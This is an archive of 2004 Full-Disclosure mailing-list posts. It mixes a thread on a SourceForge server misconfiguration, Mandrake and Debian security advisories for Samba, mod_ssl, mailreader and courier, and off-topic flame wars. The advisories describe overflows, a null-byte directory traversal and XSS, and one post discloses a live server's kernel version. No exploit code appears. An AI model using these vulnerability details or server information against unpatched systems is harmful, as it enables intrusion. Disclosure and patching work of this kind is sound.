Gregory A. Gilliss, CISSP  E-mail: [EMAIL PROTECTED]
Computer Security WWW: http://www.gilliss.com/greg/
PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Vulnerability in sourceforge.net

[Jedi/Sector One]

On Thu, Jul 22, 2004 at 01:31:21PM -0700, Gregory A. Gilliss wrote:
> Really...FreeBSD comes with user nobody set to /sbin/nologin out of the
> box.

  Wonderful.

  Just like all unix-like systems for 20 years.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Vulnerability in sourceforge.net

[J.A. Terranson]

On Thu, 22 Jul 2004, Gregory A. Gilliss wrote:

> Really...FreeBSD comes with user nobody set to /sbin/nologin out of the
> box.

And this is bad or related how?  I really do not see the connection to
this default setting (a reasonable one) and an admin's failure to config
their web server properly.

> Maybe they should have chosen a better host OS?

What on earth does the host OS have to do with this?

> On or about 2004.07.22 07:49:53 +, Todd Towles ([EMAIL PROTECTED]) said:
>
> > Sounds like they should have configured that page a bit different...made it
> > run under a little less access...or said I say..it is a mis-configuration.

Exactly!  This is host OS independent.

-- 
Yours,

J.A. Terranson
[EMAIL PROTECTED]
0xBD4A95BF

  "...justice is a duty towards those whom you love and those whom you do
  not.  And people's rights will not be harmed if the opponent speaks out
  about them."  Osama Bin Laden
- - -

  "There aught to be limits to freedom!"George Bush
- - -

Which one scares you more?

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Vulnerability in sourceforge.net

[Todd Towles]

Does OpenBSD do that?

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gregory A.
Gilliss
Sent: Thursday, July 22, 2004 3:31 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Vulnerability in sourceforge.net

Really...FreeBSD comes with user nobody set to /sbin/nologin out of the
box. Maybe they should have chosen a better host OS?

G

On or about 2004.07.22 07:49:53 +, Todd Towles
([EMAIL PROTECTED]) said:

> Sounds like they should have configured that page a bit different...made
it
> run under a little less access...or said I say..it is a mis-configuration.
> =)

-- 
Gregory A. Gilliss, CISSP  E-mail:
[EMAIL PROTECTED]
Computer Security WWW:
http://www.gilliss.com/greg/
PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C
A3

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Vulnerability in sourceforge.net

[Anders B Jansson]

nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
Todd Towles wrote:
Does OpenBSD do that?
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gregory A.
Gilliss
Sent: Thursday, July 22, 2004 3:31 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Vulnerability in sourceforge.net
Really...FreeBSD comes with user nobody set to /sbin/nologin out of the
box. Maybe they should have chosen a better host OS?
G
On or about 2004.07.22 07:49:53 +, Todd Towles
([EMAIL PROTECTED]) said:

Sounds like they should have configured that page a bit different...made
it
run under a little less access...or said I say..it is a mis-configuration.
=)

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Full-Disclosure antisemtism, -Steer it a bit back on topic-

[RandallM]

Maarten,all,

I might add that security is a big part of this subject considering
cyber-war being implemented
>From both sides. 

thank you
Randall M
 
 

<|>--__--__--
<|>
<|>Message: 6
<|>From: Maarten <[EMAIL PROTECTED]>
<|>To: [EMAIL PROTECTED]
<|>Subject: Re: [Full-Disclosure] antisemtism, FD and bandwidth 
<|>- what I want out of it
<|>Date: Thu, 22 Jul 2004 14:03:20 +0200
<|>
<|>On Thursday 22 July 2004 13:07, Harlan Carvey wrote:
<|>
<|>> Consider this...this is a public list and people will
<|>> knowing post off-topic.  Sometimes they'll even say,
<|>> "hey, this is off topic".  Now, what would happen if
<|>> you were sitting around having a couple of beers w/
<|>> your buddies and a friend of yours walked up and just
<|>> started talking about something that hand nothing
<|>> whatsoever to do with what you and your buds were
<|>> talking about?  Would you be the one to do that to
<|>> your friends?  How about a group of strangers?
<|>
<|>Except that in that social context you cannot really say there is no 
<|>moderation.  Moderation will not be official, sure, but body 
<|>language, 
<|>awkward looks and maybe a wisecrack or two will most of the 
<|>time quickly shut 
<|>up that person.  Or they will continue their conversation in 
<|>a smaller 
<|>circle, all things that are impossible or at least difficult 
<|>to do on a ML. 
<|>On a mailinglist you can continue off-list, but that is a one-to-one 
<|>conversation, not a fork like you can have in your bar scenario.
<|>Also, if the guy won't stop jabbing, you can all start to 
<|>leave and continue 
<|>elsewhere.  This doesn't happen on mailinglists, or at the 
<|>very least it is a 
<|>process that takes months to complete, instead of seconds.
<|>
<|>To steer a little bit back to on-topic, can we conclude that 
<|>all computer 
<|>systems in israel and the surrounding palestine territories 
<|>are insecure ?
<|>Because, since all real security begins with _physical_ 
<|>security, one can 
<|>easily argue that all those systems are notorously insecure.  ;-)
<|>
<|>Maarten
<|>
<|>-- 
<|>Yes of course I'm sure it's the red cable. I 
<|>guarante[^%!/+)F#0c|'NO CARRIER
<|>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] MDKSA-2004:071 - Updated samba packages fix vulnerability in SWAT, samba-server.

[Mandrake Linux Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandrakelinux Security Update Advisory
 ___

 Package name:   samba
 Advisory ID:MDKSA-2004:071
 Date:   July 22nd, 2004

 Affected versions:  10.0, 9.1, 9.2, Corporate Server 2.1,
 Multi Network Firewall 8.2
 __

 Problem Description:

 A vulnerability was discovered in SWAT, the Samba Web Administration
 Tool.  The routine used to decode the base64 data during HTTP basic
 authentication is subject to a buffer overrun caused by an invalid
 base64 character.  This same code is also used to internally decode
 the sambaMungedDial attribute value when using the ldapsam passdb
 backend, and to decode input given to the ntlm_auth tool.
 
 This vulnerability only exists in Samba versions 3.0.2 or later; 
 the 3.0.5 release fixes the vulnerability.  Systems using SWAT, the
 ldapsam passdb backend, and tose running winbindd and allowing third-
 party applications to issue authentication requests via ntlm_auth
 tool should upgrade immediately. (CAN-2004-0600)
 
 A buffer overrun has been located in the code used to support
 the 'mangling method = hash' smb.conf option.  Please be aware
 that the default setting for this parameter is 'mangling method
 = hash2' and therefore not vulnerable. This bug is present in 
 Samba 3.0.0 and later, as well as Samba 2.2.X (CAN-2004-0686)

 This update also fixes a bug where attempting to print in some cases
 would cause smbd to exit with a signal 11.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0600
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0686
 __

 Updated Packages:
  
 Mandrakelinux 10.0:
 3dc64ca8fe0f7b0aa51a2c84dc514592  10.0/RPMS/libsmbclient0-3.0.2a-3.2.100mdk.i586.rpm
 779356b9c230eb85ce37f315232cdc95  
10.0/RPMS/libsmbclient0-devel-3.0.2a-3.2.100mdk.i586.rpm
 bb4d71ecdefacd3dc3688a5eaad5  
10.0/RPMS/libsmbclient0-static-devel-3.0.2a-3.2.100mdk.i586.rpm
 74df83eb93096ffb23165dbbd28d2011  10.0/RPMS/nss_wins-3.0.2a-3.2.100mdk.i586.rpm
 02c7352e5e845c2a3e38d7e321bcbd4b  10.0/RPMS/samba-client-3.0.2a-3.2.100mdk.i586.rpm
 28e209b5899bd01b8d39f4dec3677424  10.0/RPMS/samba-common-3.0.2a-3.2.100mdk.i586.rpm
 6c5bcd82b4544fe8ddb1e0d70bacfcec  10.0/RPMS/samba-doc-3.0.2a-3.2.100mdk.i586.rpm
 43bf0b8c550df90bbe7aee619c5f27b6  
10.0/RPMS/samba-passdb-mysql-3.0.2a-3.2.100mdk.i586.rpm
 b34d77cf576bc3c6a39e50ccb04fc1ee  
10.0/RPMS/samba-passdb-xml-3.0.2a-3.2.100mdk.i586.rpm
 1a60acc6cc523537987c789daaa17b99  10.0/RPMS/samba-server-3.0.2a-3.2.100mdk.i586.rpm
 d5f09f07939dadda6d39ce619d918dce  10.0/RPMS/samba-swat-3.0.2a-3.2.100mdk.i586.rpm
 3f4abab7d5fe16d8db612b07c1c1165d  10.0/RPMS/samba-winbind-3.0.2a-3.2.100mdk.i586.rpm
 954256f8fb2dcbff886b1d6a4535bc03  10.0/SRPMS/samba-3.0.2a-3.2.100mdk.src.rpm

 Mandrakelinux 10.0/AMD64:
 cb4d44e5e85e240a61d601d94b423e82  amd64/10.0/RPMS/nss_wins-3.0.2a-3.2.100mdk.amd64.rpm
 99906563140b9dee6e919ab4ca0e61fe  
amd64/10.0/RPMS/samba-client-3.0.2a-3.2.100mdk.amd64.rpm
 cf0c4f39aa078547923032562c170884  
amd64/10.0/RPMS/samba-common-3.0.2a-3.2.100mdk.amd64.rpm
 a3a2cfd0fe222cf59408720a97eae315  
amd64/10.0/RPMS/samba-doc-3.0.2a-3.2.100mdk.amd64.rpm
 3adb7cbc3f031e1985fc356fd6cd28d6  
amd64/10.0/RPMS/samba-passdb-mysql-3.0.2a-3.2.100mdk.amd64.rpm
 d3626d21a8dfd121e6126f2c20c68b12  
amd64/10.0/RPMS/samba-passdb-xml-3.0.2a-3.2.100mdk.amd64.rpm
 7bce8bf6a2ce61b6d067d29e50cb5959  
amd64/10.0/RPMS/samba-server-3.0.2a-3.2.100mdk.amd64.rpm
 820dbe19028f73bebf2c1615aa41506c  
amd64/10.0/RPMS/samba-swat-3.0.2a-3.2.100mdk.amd64.rpm
 527d993e2e001ab8585d01f6abd5fed1  
amd64/10.0/RPMS/samba-winbind-3.0.2a-3.2.100mdk.amd64.rpm
 954256f8fb2dcbff886b1d6a4535bc03  amd64/10.0/SRPMS/samba-3.0.2a-3.2.100mdk.src.rpm

 Corporate Server 2.1:
 2e17c334f02b4247f1bf2f6e4b5837e3  
corporate/2.1/RPMS/nss_wins-2.2.7a-10.2.C21mdk.i586.rpm
 a3c3a6dce249f920c2ebef2e42d22efb  
corporate/2.1/RPMS/samba-client-2.2.7a-10.2.C21mdk.i586.rpm
 7e66a36c672abc713c3b78afa62cec4f  
corporate/2.1/RPMS/samba-common-2.2.7a-10.2.C21mdk.i586.rpm
 bf9cb0590bb03749f67b969a8ce47d5b  
corporate/2.1/RPMS/samba-doc-2.2.7a-10.2.C21mdk.i586.rpm
 ba68c6016296c95ba5e60b0caada3d7b  
corporate/2.1/RPMS/samba-server-2.2.7a-10.2.C21mdk.i586.rpm
 33d9a4c1ad830727fcc8c0c74c15b133  
corporate/2.1/RPMS/samba-swat-2.2.7a-10.2.C21mdk.i586.rpm
 045eb0d5f4564a344dd1ec52affba34e  
corporate/2.1/RPMS/samba-winbind-2.2.7a-10.2.C21mdk.i586.rpm
 f24a2423c032564d94bc4fb7166aab93  corporate/2.1/SRPMS/samba-2.2.7a-10.2.C21mdk.src.rpm

Re: [Full-Disclosure] Vulnerability in sourceforge.net

[nicolas vigier]

On Thu, 22 Jul 2004, Gregory A. Gilliss wrote:

> Really...FreeBSD comes with user nobody set to /sbin/nologin out of the
> box. Maybe they should have chosen a better host OS?

I think they should first think about updating the kernel (I submited a
Support request yesterday but they don't really seem to care a lot about
the security of this web server).

Linux sc8-pr-web6 2.4.20-24.9bigmem #1 SMP Mon Dec 1 11:14:38 EST 2003 i686

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Vulnerability in sourceforge.net

[steve menard]

Dang a new Mandrake 10 is currenlty /bin/sh
grep
[EMAIL PROTECTED] ]$ grep nobody /etc/passwd
nobody:x:99:99:Nobody:/:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
[EMAIL PROTECTED] grep nobody /etc/passwd  
nobody:x:65534:65534:Nobody:/:/bin/sh
[EMAIL PROTECTED] grep nobody /etc/passwd
nobody:x:65534:65534:Nobody:/:/bin/sh


Anders B Jansson wrote:
nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
Todd Towles wrote:
Does OpenBSD do that?
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gregory A.
Gilliss
Sent: Thursday, July 22, 2004 3:31 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Vulnerability in sourceforge.net
Really...FreeBSD comes with user nobody set to /sbin/nologin out of the
box. Maybe they should have chosen a better host OS?
G
On or about 2004.07.22 07:49:53 +, Todd Towles
([EMAIL PROTECTED]) said:

Sounds like they should have configured that page a bit 
different...made

it
run under a little less access...or said I say..it is a 
mis-configuration.
=)


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] "Fud, lies and libel" against (type any name here, I'll use mi2g)

[not-mi2g]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


On Thu, 22 Jul 2004 08:38:04 -0700 Robert Wayne <[EMAIL PROTECTED]>
wrote:

>I don't understand your point. I can laugh, you can laugh... but
>they are defamed! Can you explain why they should laugh? I don't get
>it...

de·fame
tr.v. de·famed, de·fam·ing, de·fames

   1. To damage the reputation, character, or good name of by slander
or libel.

>I don't see anywhere in their message: "trusted web sites and
>security portals posting the original hoax have contacted mi2g".
>Are you making it up (lying) ?

"In parallel, consistent negative publicity on other trusted web sites
and security portals has led to the owners of some of those sites to
contact many companies, including mi2g, with a view to buying them out
in exchange for their silence."

>It appears to me that you've spent many (valuable?) of your hours
>discrediting that company, as well as bothering us (at least me) with
>your statements.

Just you, the mi2g employee!

>You are an anonymous poster, that cowardly posts articles against
>a company and his Executive Chairman, without publishing your name!

http://www.google.com/search?hl=en&ie=UTF-8&[EMAIL PROTECTED]

http://www.google.com/search?hl=en&ie=UTF-8&[EMAIL PROTECTED]&btnG=Google+Search

You seem familiar with the concept of not posting real name while asking
questions.

>If you got a problem with mi2g may I suggest you to solve it directly
>with them instead of publishing your rubbish on security lists? You
>are abusing these lists for your own agenda and I think this is not
>fair to me nor to the other readers of the lists. Can you please stop
>posting your rants against mi2g?

For an mi2g employee, you are a retard.  My b3sp0ke intelligence thingy
sees your previous posts, where your mail comes from, and tells me you
work for them, or have some other relationship.  Are you one of those
eight customers, mad that you are spending money on their "intel" and
can't live with the idea of it being worthless?

-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkEAdhAACgkQjCNdGhHWVYwEEgCfc4hp/l9JREGLpmEuGc9IR3D/4AIA
niUdo4KJ255bxO0BiqrgZCaniuoO
=pvOd
-END PGP SIGNATURE-




Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program: 
http://www.hushmail.com/about-affiliate?l=427

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [OT] Middle East (was Re: [Full-Disclosure] IE)

[a]

> So please find a different and more appropriate venue for this discussion.

we are generating more traffic replying to this thread and feedin the trolls and 
telling others to take this offlist. please desist in all these action. it only makes 
the list more unreadable@


-aditya


ÿÿ
éb½êÞvë"žaxZÞx÷«²‰Ú”Gb¶*'¡óŠ[kj¯ðÃæj)m­ªÿr‰ÿ

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [SECURITY] [DSA 532-1] New libapache-mod-ssl packages fix multiple vulnerabilities

[debian-security-announce]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 532-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Matt Zimmerman
July 22nd, 2004 http://www.debian.org/security/faq
- --

Package: libapache-mod-ssl
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE Ids: CAN-2004-0488 CAN-2004-0700

Two vulnerabilities were discovered in libapache-mod-ssl:

  CAN-2004-0488 - Stack-based buffer overflow in the
  ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl,
  when mod_ssl is configured to trust the issuing CA, may allow remote
  attackers to execute arbitrary code via a client certificate with a
  long subject DN.

  CAN-2004-0700 - Format string vulnerability in the ssl_log function
  in ssl_engine_log.c in mod_ssl 2.8.19 for Apache 1.3.31 may allow
  remote attackers to execute arbitrary messages via format string
  specifiers in certain log messages for HTTPS.

For the current stable distribution (woody), these problems have been
fixed in version 2.8.9-2.3.

For the unstable distribution (sid), CAN-2004-0488 was fixed in
version 2.8.18, and CAN-2004-0700 will be fixed soon.

We recommend that you update your libapache-mod-ssl package.

Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3.dsc
  Size/MD5 checksum:  678 6a21d08bfe122ad4165d7764d34f0acb

http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3.diff.gz
  Size/MD5 checksum:17915 b1769bb313f5b262b0ee377cae527e63

http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9.orig.tar.gz
  Size/MD5 checksum:   752613 aad438a4ea29ae74483f7afe9db0

  Architecture independent components:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl-doc_2.8.9-2.3_all.deb
  Size/MD5 checksum:   303658 3cee43feb0382c94a91f37c869784211

  ARM architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_arm.deb
  Size/MD5 checksum:   240152 8ea7ed4b9a52ad9104c1b7241bfcfa7e

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_i386.deb
  Size/MD5 checksum:   238974 ab879ea9c8f4a25fee9f297162a720c7

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_ia64.deb
  Size/MD5 checksum:   268784 4a9593779bf0a88d6508875301aefc0b

  HP Precision architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_hppa.deb
  Size/MD5 checksum:   248170 bd367099eaea46b34f35bebfe0623ea3

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_m68k.deb
  Size/MD5 checksum:   241190 6b535557a851a978ca24c5d99cacaf6e

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_mips.deb
  Size/MD5 checksum:   236148 be9a58f7d4ebd346d6f763b55e27d4d9

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_mipsel.deb
  Size/MD5 checksum:   236104 46d64b439ff98561b0b0567cda037ca3

  PowerPC architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_powerpc.deb
  Size/MD5 checksum:   242008 97ce3ae75e342f817d16fca999a8f3ba

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_s390.deb
  Size/MD5 checksum:   242124 8ee93b53824da39d4a500d29fe01df23

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/liba/libapache-mod-ssl/libapache-mod-ssl_2.8.9-2.3_sparc.deb
  Size/MD5 checksum:   244208 c680da2eca743338d02cdb50c6baec23

  These files will probably be moved into the stable distribution on
  its next revision.

- -
For 

[Full-Disclosure] [SECURITY] [DSA 534-1] New mailreader packages fix directory traversal vulnerability

[debian-security-announce]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 534-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Matt Zimmerman
July 22nd, 2004 http://www.debian.org/security/faq
- --

Package: mailreader
Vulnerability  : directory traversal
Problem-Type   : remote
Debian-specific: no
CVE Ids: CAN-2002-1581

A directory traversal vulnerability was discovered in mailreader
whereby remote attackers could view arbitrary files with the
privileges of the nph-mr.cgi process (by default, www-data) via
relative paths and a null byte in the configLanguage parameter.

For the current stable distribution (woody), this problem has been
fixed in version 2.3.29-5woody1.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you update your mailreader package.

Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/m/mailreader/mailreader_2.3.29-5woody1.dsc
  Size/MD5 checksum:  623 40827025821290e7130571a78fd0b06d

http://security.debian.org/pool/updates/main/m/mailreader/mailreader_2.3.29-5woody1.diff.gz
  Size/MD5 checksum:39678 b172e5b8957ee2f6b44122e0d3c99e06

http://security.debian.org/pool/updates/main/m/mailreader/mailreader_2.3.29.orig.tar.gz
  Size/MD5 checksum:   307934 8e2687227ac737f244994e19ca3ba575

  Architecture independent components:


http://security.debian.org/pool/updates/main/m/mailreader/mailreader_2.3.29-5woody1_all.deb
  Size/MD5 checksum:   362912 d3708d9d7ecc4064797f12cbe7d8489e

  These files will probably be moved into the stable distribution on
  its next revision.

- -
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBAIvOArxCt0PiXR4RAqDwAKCB50r82Lo+qViykid4ltYvAgQwegCgrZ+i
r6C1oBVSI+hEwVEytCvO70A=
=PUix
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [SECURITY] [DSA 533-1] New courier packages fix cross-site scripting vulnerability

[debian-security-announce]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 533-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Matt Zimmerman
July 22nd, 2004 http://www.debian.org/security/faq
- --

Package: courier
Vulnerability  : cross-site scripting
Problem-Type   : remote
Debian-specific: no
CVE Ids: CAN-2004-0591

A cross-site scripting vulnerability was discovered in sqwebmail, a
web mail application provided by the courier mail suite, whereby an
attacker could cause web script to be executed within the security
context of the sqwebmail application by injecting it via an email
message.

For the current stable distribution (woody), this problem has been
fixed in version 0.37.3-2.5.

For the unstable distribution (sid), this problem has been fixed in
version 0.45.4-4.

We recommend that you update your courier package.

Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- 

  Source archives:

http://security.debian.org/pool/updates/main/c/courier/courier_0.37.3-2.5.dsc
  Size/MD5 checksum:  913 9f807cbbd29262fb1122b65060255364
http://security.debian.org/pool/updates/main/c/courier/courier_0.37.3-2.5.diff.gz
  Size/MD5 checksum:33252 c3005c334dbc98f1ced5e6d27d014176
http://security.debian.org/pool/updates/main/c/courier/courier_0.37.3.orig.tar.gz
  Size/MD5 checksum:  3238013 350cbb2e8b5f384409bdf2a15d605bc9

  Architecture independent components:


http://security.debian.org/pool/updates/main/c/courier/courier-doc_0.37.3-2.5_all.deb
  Size/MD5 checksum:   321874 9766f52b62a87e349154d49c8a01eb9a

  ARM architecture:


http://security.debian.org/pool/updates/main/c/courier/courier-authdaemon_0.37.3-2.5_arm.deb
  Size/MD5 checksum:47248 1a82fe557d0cf909f84b1477eb0421c3

http://security.debian.org/pool/updates/main/c/courier/courier-authmysql_0.37.3-2.5_arm.deb
  Size/MD5 checksum:42402 5bbae529773a02ed4eb3873dbe14e095

http://security.debian.org/pool/updates/main/c/courier/courier-base_0.37.3-2.5_arm.deb
  Size/MD5 checksum:   128588 ea9b559cc3634519f8539835404f0255

http://security.debian.org/pool/updates/main/c/courier/courier-debug_0.37.3-2.5_arm.deb
  Size/MD5 checksum:17588 1f95e1b55d8d8e63e5d948cd749b1d4f

http://security.debian.org/pool/updates/main/c/courier/courier-imap_1.4.3-2.5_arm.deb
  Size/MD5 checksum:   124534 98bf7ffaf73426973e4d6def6327f655

http://security.debian.org/pool/updates/main/c/courier/courier-ldap_0.37.3-2.5_arm.deb
  Size/MD5 checksum:53570 2f74be30e779c10c4978333d6520a50d

http://security.debian.org/pool/updates/main/c/courier/courier-maildrop_0.37.3-2.5_arm.deb
  Size/MD5 checksum:   180048 f1a6336bc28cf72c0d67d4a3074fbbf1

http://security.debian.org/pool/updates/main/c/courier/courier-mlm_0.37.3-2.5_arm.deb
  Size/MD5 checksum:   116172 aec23a01271bccf1fcd4a922533001e9

http://security.debian.org/pool/updates/main/c/courier/courier-mta_0.37.3-2.5_arm.deb
  Size/MD5 checksum:   549764 cb8808bb78b9411c726e08514e14d8bd

http://security.debian.org/pool/updates/main/c/courier/courier-pcp_0.37.3-2.5_arm.deb
  Size/MD5 checksum:55770 32c57eb11742bee944b25f72ec8c14f7

http://security.debian.org/pool/updates/main/c/courier/courier-pop_0.37.3-2.5_arm.deb
  Size/MD5 checksum:35314 cfcd25187c79ab131678c222f124cd21

http://security.debian.org/pool/updates/main/c/courier/courier-webadmin_0.37.3-2.5_arm.deb
  Size/MD5 checksum:24978 2af9134d310f12a142c6199effc34577
http://security.debian.org/pool/updates/main/c/courier/sqwebmail_0.37.3-2.5_arm.deb
  Size/MD5 checksum:   297356 f8d25450c784a3877d7593f64d628858

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/c/courier/courier-authdaemon_0.37.3-2.5_i386.deb
  Size/MD5 checksum:46322 dc4493b38acd559a4a3dcc9eb335160a

http://security.debian.org/pool/updates/main/c/courier/courier-authmysql_0.37.3-2.5_i386.deb
  Size/MD5 checksum:41754 8d9fc5959af9e155d722a8c9a4bed302

http://security.debian.org/pool/updates/main/c/courier/courier-base_0.37.3-2.5_i386.deb
  Size/MD5 checksum:   129470 9a056627abc8d69c57c226e88b7775b4

http://security.debian.org/pool/updates/main/c/courier/courier-debug_0.37.3-2.5_i386.deb
   

Re: [Full-Disclosure] Vulnerability in sourceforge.net

[a]

> Does OpenBSD do that?

yes by default openbsd dose not even start the httpd  so it is more secure 
-aditya 
ÿÿ
éb½êÞvë"žaxZÞx÷«²‰Ú”Gb¶*'¡óŠ[kj¯ðÃæj)m­ªÿr‰ÿ

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html